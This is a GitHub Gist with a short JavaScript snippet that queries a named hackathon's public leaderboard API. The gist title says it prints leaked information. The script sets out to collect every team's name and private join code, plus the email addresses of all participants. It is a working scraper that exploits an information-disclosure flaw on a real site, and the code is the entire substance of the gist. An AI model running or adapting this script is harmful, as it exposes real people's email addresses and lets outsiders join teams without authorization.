Created
October 28, 2023 19:24
-
-
Save PatheticMustan/4804dcf60a7004bbc90e70ee44677c86 to your computer and use it in GitHub Desktop.
print info leaked in https://apply.vandyhacks.org/api/leaderboard
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
fetch("https://apply.vandyhacks.org/api/leaderboard") | |
.then(v => v.json()) | |
.then(v => { | |
x = v; | |
console.log("TEAM CODES:\n\n" + Array.from(new Set(v.map(v => [v.team?.name, v.team?.joinCode].join(": ")))).filter(v => v !== ": ").join("\n")); | |
console.log("EMAILS:\n\n" + Array.from(new Set(v.map(v => v.email))).filter(v => v).join("\n")) | |
}) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment